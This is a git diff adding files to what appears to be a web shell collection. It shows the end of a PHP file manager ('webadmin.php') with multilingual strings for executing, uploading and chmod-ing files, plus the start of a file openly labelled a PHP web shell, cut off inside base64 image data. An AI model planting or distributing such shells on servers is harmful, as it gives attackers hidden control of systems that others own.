+'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
+'copy_files' => 'Kopier disse filer:',
+'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
+'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan ikke redigeres.',
+'executed' => "\"[%1]\" er blevet kørt korrekt:\n{%2}",
+'not_executed' => "\"[%1]\" kan ikke køres korrekt:\n{%2}",
+'saved' => '"[%1]" er blevet gemt.',
+'not_saved' => '"[%1]" kunne ikke gemmes.',
+'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
+'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
+'permission_for' => 'Rettigheder for "[%1]":',
+'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
+'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sættes til [%2].',
+'not_readable' => '"[%1]" Kan ikke læses.'
+		);
+
+	case 'tr':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Klasör',
+'file' => 'Dosya',
+'filename' => 'dosya adi',
+
+'size' => 'boyutu',
+'permission' => 'Izin',
+'owner' => 'sahib',
+'group' => 'Grup',
+'other' => 'Digerleri',
+'functions' => 'Fonksiyonlar',
+
+'read' => 'oku',
+'write' => 'yaz',
+'execute' => 'çalistir',
+
+'create_symlink' => 'yarat symlink',
+'delete' => 'sil',
+'rename' => 'ad degistir',
+'move' => 'tasi',
+'copy' => 'kopyala',
+'edit' => 'düzenle',
+'download' => 'indir',
+'upload' => 'yükle',
+'create' => 'create',
+'change' => 'degistir',
+'save' => 'kaydet',
+'set' => 'ayar',
+'reset' => 'sifirla',
+'relative' => 'Hedef yola göre',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'back' => 'Geri',
+'destination' => 'Hedef',
+'symlink' => 'Kýsa yol',
+'no_output' => 'çikti yok',
+
+'user' => 'Kullanici',
+'password' => 'Sifre',
+'add' => 'ekle',
+'add_basic_auth' => 'ekle basit-authentification',
+
+'uploaded' => '"[%1]" yüklendi.',
+'not_uploaded' => '"[%1]" yüklenemedi.',
+'already_exists' => '"[%1]" kullanilmakta.',
+'created' => '"[%1]" olusturuldu.',
+'not_created' => '"[%1]" olusturulamadi.',
+'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?',
+'deleted' => "Bu dosyalar silindi:\n[%1]",
+'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
+'rename_file' => 'Adi degisen dosya:',
+'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
+'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
+'move_files' => 'Tasinan dosyalar:',
+'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
+'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
+'copy_files' => 'Kopyalanan dosyalar:',
+'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
+'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" düzenlenemiyor.',
+'executed' => "\"[%1]\" basariyla çalistirildi:\n{%2}",
+'not_executed' => "\"[%1]\" çalistirilamadi:\n{%2}",
+'saved' => '"[%1]" kaydedildi.',
+'not_saved' => '"[%1]" kaydedilemedi.',
+'symlinked' => '"[%2]" den "[%1]" e kýsayol oluþturuldu.',
+'not_symlinked' => '"[%2]"den "[%1]" e kýsayol oluþturulamadý.',
+'permission_for' => 'Izinler "[%1]":',
+'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
+'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
+'not_readable' => '"[%1]" okunamiyor.'
+		);
+
+	case 'cs':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'UTF-8';
+
+		return array(
+'directory' => 'Adresář',
+'file' => 'Soubor',
+'filename' => 'Jméno souboru',
+
+'size' => 'Velikost',
+'permission' => 'Práva',
+'owner' => 'Vlastník',
+'group' => 'Skupina',
+'other' => 'Ostatní',
+'functions' => 'Funkce',
+
+'read' => 'Čtení',
+'write' => 'Zápis',
+'execute' => 'Spouštění',
+
+'create_symlink' => 'Vytvořit symbolický odkaz',
+'delete' => 'Smazat',
+'rename' => 'Přejmenovat',
+'move' => 'Přesunout',
+'copy' => 'Zkopírovat',
+'edit' => 'Otevřít',
+'download' => 'Stáhnout',
+'upload' => 'Nahraj na server',
+'create' => 'Vytvořit',
+'change' => 'Změnit',
+'save' => 'Uložit',
+'set' => 'Nastavit',
+'reset' => 'zpět',
+'relative' => 'Relatif',
+
+'yes' => 'Ano',
+'no' => 'Ne',
+'back' => 'Zpět',
+'destination' => 'Destination',
+'symlink' => 'Symbolický odkaz',
+'no_output' => 'Prázdný výstup',
+
+'user' => 'Uživatel',
+'password' => 'Heslo',
+'add' => 'Přidat',
+'add_basic_auth' => 'přidej základní autentizaci',
+
+'uploaded' => 'Soubor "[%1]" byl nahrán na server.',
+'not_uploaded' => 'Soubor "[%1]" nebyl nahrán na server.',
+'already_exists' => 'Soubor "[%1]" už exituje.',
+'created' => 'Soubor "[%1]" byl vytvořen.',
+'not_created' => 'Soubor "[%1]" nemohl být  vytvořen.',
+'really_delete' => 'Vymazat soubor?',
+'deleted' => "Byly vymazány tyto soubory:\n[%1]",
+'not_deleted' => "Tyto soubory nemohly být vytvořeny:\n[%1]",
+'rename_file' => 'Přejmenuj soubory:',
+'renamed' => 'Soubor "[%1]" byl přejmenován na "[%2]".',
+'not_renamed' => 'Soubor "[%1]" nemohl být přejmenován na "[%2]".',
+'move_files' => 'Přemístit tyto soubory:',
+'moved' => "Tyto soubory byly přemístěny do \"[%2]\":\n[%1]",
+'not_moved' => "Tyto soubory nemohly být přemístěny do \"[%2]\":\n[%1]",
+'copy_files' => 'Zkopírovat tyto soubory:',
+'copied' => "Tyto soubory byly zkopírovány do \"[%2]\":\n[%1]",
+'not_copied' => "Tyto soubory nemohly být zkopírovány do \"[%2]\":\n[%1]",
+'not_edited' => 'Soubor "[%1]" nemohl být otevřen.',
+'executed' => "SOubor \"[%1]\" byl spuštěn :\n{%2}",
+'not_executed' => "Soubor \"[%1]\" nemohl být spuštěn:\n{%2}",
+'saved' => 'Soubor "[%1]" byl uložen.',
+'not_saved' => 'Soubor "[%1]" nemohl být uložen.',
+'symlinked' => 'Byl vyvořen symbolický odkaz "[%2]" na soubor "[%1]".',
+'not_symlinked' => 'Symbolický odkaz "[%2]" na soubor "[%1]" nemohl být vytvořen.',
+'permission_for' => 'Práva k "[%1]":',
+'permission_set' => 'Práva k "[%1]" byla změněna na [%2].',
+'permission_not_set' => 'Práva k "[%1]" nemohla být změněna na [%2].',
+'not_readable' => 'Soubor "[%1]" není možno pře�íst.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Filename',
+
+'size' => 'Size',
+'permission' => 'Permission',
+'owner' => 'Owner',
+'group' => 'Group',
+'other' => 'Others',
+'functions' => 'Functions',
+
+'read' => 'read',
+'write' => 'write',
+'execute' => 'execute',
+
+'create_symlink' => 'create symlink',
+'delete' => 'delete',
+'rename' => 'rename',
+'move' => 'move',
+'copy' => 'copy',
+'edit' => 'edit',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'create',
+'change' => 'change',
+'save' => 'save',
+'set' => 'set',
+'reset' => 'reset',
+'relative' => 'Relative path to target',
+
+'yes' => 'Yes',
+'no' => 'No',
+'back' => 'back',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'add',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" has been uploaded.',
+'not_uploaded' => '"[%1]" could not be uploaded.',
+'already_exists' => '"[%1]" already exists.',
+'created' => '"[%1]" has been created.',
+'not_created' => '"[%1]" could not be created.',
+'really_delete' => 'Delete these files?',
+'deleted' => "These files have been deleted:\n[%1]",
+'not_deleted' => "These files could not be deleted:\n[%1]",
+'rename_file' => 'Rename file:',
+'renamed' => '"[%1]" has been renamed to "[%2]".',
+'not_renamed' => '"[%1] could not be renamed to "[%2]".',
+'move_files' => 'Move these files:',
+'moved' => "These files have been moved to \"[%2]\":\n[%1]",
+'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
+'copy_files' => 'Copy these files:',
+'copied' => "These files have been copied to \"[%2]\":\n[%1]",
+'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" can not be edited.',
+'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
+'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
+'saved' => '"[%1]" has been saved.',
+'not_saved' => '"[%1]" could not be saved.',
+'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
+'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
+'permission_for' => 'Permission of "[%1]":',
+'permission_set' => 'Permission of "[%1]" was set to [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" can not be read.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $site_charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
+
+<title>webadmin.php</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 17px; height: 13px }
+a, a:visited { text-decoration: none; color: navy }
+hr { border-style: none; height: 1px; background-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; background: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .functions { text-align: left }
+.listing_footer td { background: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { background: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; background: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { background: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { background: maroon; color: white; border: 1px solid silver }
+#notice td { background: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
diff --git a/xakep-shells/PHP/webshell.php.txt b/xakep-shells/PHP/webshell.php.txt
new file mode 100644
index 0000000..766b719
--- /dev/null
+++ b/xakep-shells/PHP/webshell.php.txt
@@ -0,0 +1,268 @@
+<?php
+
+//This PHP Web Shell was developed by Digital Outcast It is  open software and completely free to modify in any way you wish. Have fun and don't be all skiddy and just take credit for creating it. Bad things will happen if you do.
+$images = array( "banner" =>"R0lGODlhWAKWAOf/AAYDCQgFCgYGEgkGDAcIEwgJFAUKGBAHDgYLGQwKFQQNHggMGhMJEAkOGg8LGgwMHhkJEg0NHx4JDgoPJQ4OIBcMGA8QIRcNHB4LFQwRJhUPIhIQJh4NGg4TKA8SLBMRKCcMEx0PHxAULhUUKhYTLigOGREXKxIWMBoTKx0TJhQVNTENExQXMigRIBEaODIPGhkYLhYYOBYZNBwWOBwYNDoPFCkUKRkaOiQXMRUcQDsQGhodOBscPEIPGBwbQTUUIyQZNyEaPRgfRB8fQCAeRUoSGBwgTB4iPyYeQBwiR0wSHSQeS1IQG0YVIzgbMzMdOiAjTyQjRVwQFi8fQiAlS1YTGSUjSxwmV1wRHCMmUkkaLkQcNVkWHFgWIF8UHi4kTlQZKScnWicqSlgYJSEqWyMpYScqUScqVi0nVjgkSlMcLlwaIyooYUgiQV0cKTgnU00hO1QfOy0vXCkwYiovZy8uYV8fMEkmSS4xWTQuXUYoUEArVF4hOi80VWAhNkAsWl4iQDwuYi4zcjA0bjA1aTM2Y2MlPlooR2AmSGMmRGAoTjA6eVIwXDY7bjY6dGYqR14tUFwuVWIrVjk6ezY8g2YtVGgtT10wXWEuXkw3az1AaUY5eTdAfztAejxBdFk0a0BFaGszWWk0ZD5Eiz5Fhmw1YD1HgWU4Zmg2amg4YENFgURIdkFEmkRIfkBHlkBGp2g8d0ZMh20+a0VMjUZLk20+cVhFi2NEhHVDbG9FiUtSp1BWhU5UlkxToU9VkU5UnHVHeUtSsVNYfFJWjHJIgntRiXpTkFhgqVdet3hUl1hgr1pin1thpFxjmlhi1mRpmIJdn19nzWJqxGZtq2lxk2VttGVsvWhvp3F4u293zHN7sXB42Gx37nN8x3B64niA1nqCxoCGqYGJv3uH/4ON5IOM7YeP3IeR1YON+Y2VzZOeuJKd8pCc/5eh/Zmj7Zul5p+n3J+q/6qwwqy13aez/6+37rK82rC9/7rG/8HP/crX/9Lg/+Dv/+j4//P///7//CH+FUNyZWF0ZWQgd2l0aCBUaGUgR0lNUAAsAAAAAFgClgAACP4ADQgcaGCBwYMIHShcuPCBQ4cKIjp4SLGixQcRMmrcyJGCx48gQ3qcQLIkSZAmU6pcybKlSpQuV4qcGZKjzZsZL+qkyLCnz4UIgwYlSLSo0aNIBShdyrSp06dQo0qdSrWqVagBsmrdyrWr169gw4odS7as2bNo06rd+rOtwohw4xJdqKCB3bt2FejEmbFkR5oUXs6ckKEw4MOBWQ4+GbKwYcQiHTtOHJMlXwU5deLFG7ezZ7huQ4t2kKC06dMJCqhezboAUoKtY8ueTXv2VaVr1wogwLu379/Aed+mGry48eC5kytfntvzUb1td0bQ6UCvxb4rH5qMoCCxx7giFf5/lExecofzHQpv0EAzw4b3Gx5TcB//PMjz5R1PeG+SQkQLHmUAGQUaVdSSf9btdN1oPT0A12vOvcbga6oNB9VxwuE21gBnWejhUgQwJ+KIWxHw4W0YpqjiiiwaF4BP1BlAnUUS7VVdgtjtFcEEFE2gwQQjTWDBkBoASAGAQM4kGWQbgMQfYfllYNJ7kpHUJAUdfKClR0YuduV8GhT50ZCIsbTTRwpe5ABOOxnQUEWhPRDaawO1ZUAFA9EmUG2r7YYhn7G1yBuJYQlq3IkgGqoiAFkx6mgAj0YK6aSSVkrppZZmiummmnbK6aYBECXUAgrJ2eBFbk4kXUZwZXZTSf4KkBTBSCGFqUEGQw6ZgQIWmDTZeOTBBx9h6AWmXn5QFmZlfFASex96wjq2QUnxCagembnmKtN3BPLFapBpYqTmaKYqFJQCCxiggFERHdWTAAksFW+8TyUgEGlJCWBAAVPx6+dxgLL2b4oBKGrwVoxOqnDCDDcKwMPKPdzwwo1WTPHFAPAm8cYcd+zxxyCHLPLIJJfMccEA9CRUdXJGuC5BD9XFGVwPzZqYTbBGhGCSIcVqmAWO6frRl0t6NGxKFBCdtJTCNn30svsljSV67AW57LQkPZCkgMbiWu2vAwK5kUkROZS1TnA1kLban3WmqoNAkbpAuT/RvVBRdh4Vr/6bqJlW4b61CaBaircVsGLBBguaVW+Qhphx45A//jihkjtueeSXV954xgyb7PnnoIcuOgEPE+STAg7ICKOcM/KkEY7TYaQRSXB9ZLN3ifFqAa9Sc9mkYxH8umwHJZU3LXoZfOCjlDE9aeUEHyQfn65ZRq9fSUEaJh/XH/HKvEoCYr9d7WebzaOD52NEgQMelSq7aA/UCVrqqdPZruk9pTqXQqbr66b/BmjKnlxToaf4SykAA9QACjgw5PiGUF3pTcZIh7IKUvCCjEqciyyYwQ5y8IMUrJjGREfCEpoQdJBi1Nvw5pBUuW8nBoldzWqGmVdNQGce2dFJdveRJJ0nW/5HytV8egispDHGaE3zGnxwlYFbVWY/WCOJtXz0Q6DR5z0j4Q/TqmWBLInJilni3mBo4qMcEqh8WuuO1qYTAfa10SMOUUiBfiIjiLypOi/kCUPohrf/OQBeAVRKaZbipgDyzV4EEQCeVDPA2AhuNYTTUFcKkBUOjeWBGjwcyhg3qE6GyJMTC6XFRKkwTyLulKZMJekYxzmHnfCVsIxlCkNVkAa96SFvs0gd07QmjtCuO2eU1UgE1B2ecUlXFigS0AKUgfR8bT/UepoUk1e85KnHaUlkHpXiEz1udvED89GPln4EReZJqQMeyVIVgfW9/iTJmAQaCati1SP/rJE7nf4hEJyoQxfUCaRldBrI/eh3N/oJQCEHJSj/AikQ/8ELXvQioMCacsBEFWc1dypABTSq0Uf2qYEOZBwEFxciAWglRAVbnEpTOikMasxEGRNATGcKU5gGwKQsRalOV7pTljpshIiLpVCHGjrSca6foHGQnO71IHURJXZ12csEsDPPHJ7tdgEKTGK45h5rdRVLAALQtIQFJCoFDYjxERbQnrbEKVWLMF+rjwVG0MUODKlJVmznSdYztY9oAD/yGeNJjFkSrU2VO4Xljj7h+Z245EUu93IQ6l6YKru5zyeFrN+9ClmnzRIEkYYsqFL2ZC9GAk5gjsQQAp3SGqYcB3GezP6kiz750ocZ9ba2neDmbou53laupLnlnHBxO9zcohRiQXUlUZfLXI+lEAD32mMhY3bHmk3HLrk0kA7NZ9XzzeqXwAzfeJA0xDFRQEsfQGc7u0oe9KI3WVJKr7KYRa0qlVNKXYViej5gAfQmz3r0uZqzpha9Y+a1PEB653wUIKUeOuQ9ko2VzViF1fWxr31sZEiBUvWyyk62hUXpMFPjx5DMLrQp8zJoQ/X1R4GkJoB4Aty+mFJRpfDrTyZqyk2XwkA/+XiVnJRtcUj6yYRh8IONGtQol4yxRpn0yFD2YJRFatQONvfKzV0Yo5Y6kPixzoVxUZAMK8JGvcyzLw7RIf6QGGwtWmFPe+GkgAbSC5LwhS8+SDTrsa4In1t1ID4eCHSgJyBoQRfGAxtANKGtx191/pA++nEeGKtYV/zAp7zj8c7uOgBMe55tPawS21TjaTOdXbhb2XVIA2KX3VK9DE6XfQv9TMdZF9Jxby02ZKoEZy9BYhS1rb3xoQhgOH4ZWzULdIpwhANb2iqZRFSGLU956jiSLo6mMq1ptrftZMjldNrfZqmRUeptLJt7qJFj1GQnwm7W4RKpFGlAmiIyK42AS4cgqVr4EpzpIXLNPn89Dzg7EKYnacmt/HmSWbNUn3Z6QCWDfvig3bPfZvZ3Ax8Yq54JQ5iM9xlaXKXWrf6WxDXCsGdIyzKf1iBs2DUeFoe8yku3xuzuUt2tjm6K40KJ8jL6QafWN9ebigeir9EGkID+Y2SFaiy4poMUOALg0AKzQskBWJ0rOEXcbiYYWyFLsNnNDi5xazvBVkYZhBRk2NjFznazE5m35477CdfuAIOgDnVert/b1i2QBch7VWueXWZkVWGtKhhKccZVetLJtSH9uUpxdVqg/0sSALvHA80cltOeh7VEU1xLHRhBYaL3cClNnj6YZ69dUT61HwXp0reKcziXqU+Wp29aZsZIrOAZq8bGxe9qaxne00xinUs21javtYk1ezd7JYA0B/3f/xzqWdOWRsYzduSxU/4EbNsg0DdPDvKzmdPJlT4uc8dNmMO0ojkAmNT9kHq/TJOcbd+iH3NlV7KRlSv3/ofuuQBgEO0mI7u0Lj5nHTL0dzphO/TkFw5heJRhePyWVeEkIHXlEelVRekhINNyLM5TEtaDHx4gcKM3LYGWaIaWAYKWVsyCefURPWGEeenxcISWenC1H6MXegwXHxpgVsUDX4/RJCnRckRIThlhTzNReL0kLpMlMx7mPpXFZQThT6aiVHWycwyRUA2FUC6mWUqROhylFIs0UTTmdMKWQH2ifSb1LyS1dZjkdTsFHJzTU1/nG2XHZKQUUyEUbnTIU+oHMbm1SSPkf4Q4Ms9FKf4qxD+p42UupFQfFi6GdUPdsSPiYjbeMYEQ6G/aIyA92EwYmB65kl5r5XnSQhiBhh7pcR7vMYOA5kw0iGjwcXqHpoIeQHqBloHplYsYF2A16HnTEnDRM3KQJ15wxT36UXI8cj5nwyP0BhJ/sSNY5UYZ4QCrFkfEV4WvdjfDVy4E2HOqw3w7l0iIxGKpc1BGF32Cs2LYp4ZLF0k7NgCs5XTL1hvh13WyFXbkdkrFlWQhNFxAln//+FKUohQPI1PFdZD9aDmrpFvqB4CF+JAnIzFpp2484W6W5WUPIG8KuBcIcjNT9QBkxG8nYYzhZCVT4x79NQJ2dR4jB0X8kXq02P5w1VKL71GLWoJosFhoGud5MNlNG1A96pReMuiCWGN6yfNnP9lMG+hMPPgBPcgsTylezLQBhgVhhUUYEThz0EhhaVM7GpFqDTA39GONSsVuREFiqlNIPQeO/FMaC8FiX6hrhQRAFaAvGjVAM8ZjZmhRwWE4p1UAVrdAxiaPbKh1QKYxy1GHYMeHkwMxx5VkyJWHFnNSUlaZHCSQswSZggiRnLkxRpVCuDVreORPdZRLEeB3GakT6ZNmUxURyahVIXF4WTUZHJhgkwE9uNJFc2ZX/KUshIab0pJxH5CCiVYffzaDNEgShYaTNYl5zpmLKpmLKmiCJ1icE5CKP6kr6/5RcMUoGewRTSeZRQqnHSApEn2BWKN2OzzTKtwxN1W4iOUSPy6kLpeVWZ7FbgYYjjeXUOgYXfzSUA3FSDb2a2n4SB7FfSZFSatRSQEAj+w3j8z2hvd4U0Vmj6eEOasUOSeVFTjVoRzKdaTzfpfDh+YHmrtVSq3kkJ1ZiJzyMBXJMvJJYmWTJtPRKloDm7rXaQm2o1oFZ13TgWk1H3YlII72TcmDkw/3gjWJgsIyeTYplNFTg4O2REi6pCPoaLlYPbXoGE6aaMOZPCMQpkqJlGOlHvMBYFI0TFNlElVJlRsQPLF5WPbUF4fBHWtSFzMaATnXQhahKnonI3iXlvSpWf7zeS/oSFBFR337gkhK5xoy5i+D6XR8CXWu4VGrsVEV8huFuWwg2pBpAUo4RW6rJAG2ZX4ZBGRB9VIBuZCaOUprN1zXdpms2lJVtqL+RylVtn6zlndydJp2mmoVESvAhGZsVBJ/5ZqwqWBcFWdR9IvJ04PRg4uoGEbScoKXN53G+XgZeB5XWp3NaWjOuZzD2QG1GHqgJ4Kn9zXuIV/7pSWSoXHACWnruoHfYz7UMlgUKE9nxB030T05NBHTmHtddnPaOBEEWD/xM1lXiIWKCC/lyGKIVD+OChuO2qiA03RLxxoAQ2wMVFGLOUEDU4/OdjA3pVvAkVIgcH4ZmlyUif6Hk+l+IaRt7Xd/oNSPD7o5/Ger57Y5jiI5W2aNb2NzqmIXqWkR/pFDlCgrzLhGsRck3uFV8yFFPjK15KFftwI0TrmSGjCCX7qu8kqLp8i1tSgCN3l5hTacy/l5GZclHhCmKkmuNgmLKLicP4leyGOLKghpbdWJnBhFERBFWdMfDaZgOYQZWvk6MDeJbTR8NdRGEEER0PFli0hQ0VUdC9tZhfR8uRagqYMnf1SX+1KXBHqxkMpaxbEbPGZ1GPt94Aehbfh2imKyK5WqiKMD4nahp6qQ+bdtM0WZoap+fWhBS8aqEgRUtaqz5/aZkRKabnJ3CGuRD7Fq1oGA3SOssf7DIxHwIw8wLU4Lm21WXu7xPNA0ch3YTHOWXiagAW9LraQoaGiLirUotiMoAiMgAjkZv+/xpcsJt+baASLwv+QqcCtYnIi2X+jhXuQ6euzVeXrWTPjFeTzCnbfDQ7hDKzhzhP7qHxwhb+xmsIXKEAr7p3W0LiF8ufwTfX5kWg4FQOVYsRK1JwaqfcZRbIpUITfVbD7Gj0+3sp8aZNKWUrxxADUAOSP0j9cmdr2ldWonfwZpkLglQsWrdp9ZSumHvISYdgAItGb2WA7inuozHSyzEdzycmgEku9km5oIVz8ijB0IV8VpnJkncCagi+EqgwdcaPybJWTLttW5nPUbpv7LKWjk+gEjQMj+O4Kp16WCbLcHjHENl7fuik0cmHDQFE1SlC28c0QJBo27ZzsgwZ4ZKUOYAb3U9RA5J6hmeXemgrn1szcBlC6kYgCgRXR58sKtJal6ucPzaFIDQFta4SeGaSJUJn6KY212mEoY8AIlyn4dZLMYg1OcA83Aa5lGDJpzuH4cVKpWbG4AaM2I+CLL56d4ZF341EZ/QSCdbDbbxaPgG7VCKLVThINRVBj4kXHNlF51m8BoS8CBRr/oFb/2G8DlCrceQL//a7+C9r9/DMD067b0W9AiALeA9sbDOa6FHLaXh4J5qyzXZCXKoxKAO2rzsQEmIES0YjuvSf5v9qZY64POscM2A/jBBBWj0XWFpDmfilg/B7UABeAA/JIu6JiO+oKptuzClrp0rDvDgyOH9KghINu6InUWVDY5OvVJA7ACIFBbD8SQfvhS2QazpSqiIZrE6ad/CpNTplRu23xl3dyzExkAFWkq06hq0jusN+NLFIA+lEiVN3rGiSeeUnIrc7YBFtDG16StRxqd/GUChSxf0/mkYEuuZAvR9RvRB/2/aBu/KFDQN0kCtejZ/XwCjE22aIvQk42Ch6yD/3yUwpKK6qSCHs1xylnJV1kt3ZKbu9IlWjUrvIPSR9hpk1iW7TbKjwu5rDOWlYs/tMZZJ1wAPG0QPX10RP4BQBb7l0xXupFEzByKG7sszMKsyymSu6iqZJ9UAD2AAS2ldppJW/s4xQnzZK26MLzFj6KKqt5WvIO41kRVq8dbXLuKmjMkb4p1YaMsYWuajECiNQruTv0x0u6RGOqqwF1VnF0VrfV8HiPwk2yrv/vLrSqJ0Ij8AQ+Ntp6tJSQA4iIA2h7g2Q1tAh1AAmF6AllSyPUbyFdK46golCd4v14LWCw4Vi4pPrqyV7kJIMwDm1XzyRj8HewTuTkhEQv1FjV93P8kn7Y2qPKZ0/cC3TLGwm4ysXfyqKwRoME2mDgGdfFoIvS3FR2qOJipkJxkdV3AANGmzde2h7gKmYMCf/7vtzi8azkMOW4TKTkXetYqqt+w1NYSg4gAkGZ1dBd68Xe3ozOjlkbKiD4EogEKfoRJ8p2GUV+BIdh7llbMI4PYCnoijsD+W9HpFaaXHdH9bNAH3bazPuubjQIj0M+FhtAnftD+a78o/r9jW9Aj+MeFDMDIM4KHRpS76JuUnBLwMaTKciSFsTtdckQdua8dOQENoMHR67jEN85KlXdxVOUO4lTCpz/MLbEI4dye+1BhPlpF3Ug1VrpLHd451hSqy93azakeesMAH6qo5GzNzBsFwABe8KB3WFv8eIeNk5AFD38VFKv8aKoT/2wp+o+ILks9y+iLPkv000ZBq4C8Pf5ZGpwT/vGR9UY7D4Y1lOHyIfceeZVwgAa20LPjV6olGj4CJuDPk03sT3rsDY22lX3QlW3jEF3rEN22JsDYJ1Dr/jycNU7jJwDIbQu3N6njM6nROp9os+31TwNWRUQBJa3bITEkk1hDKMGEZbMmx8cyNHPKH4aFX6bu+hPldccaDYB0RAHmpeXCtBHDk3q6OMUhghMAH8WGxWGyvqxK36ZbA68VJdAFW21kf7iQGZ+ifY4xau5+8/fw48b4XEdSKjurG5/owsWznjlLYBy5lZiRdeEARlJvYmzgE3aVZmxEZTRfRRmM8zV5v1l5XD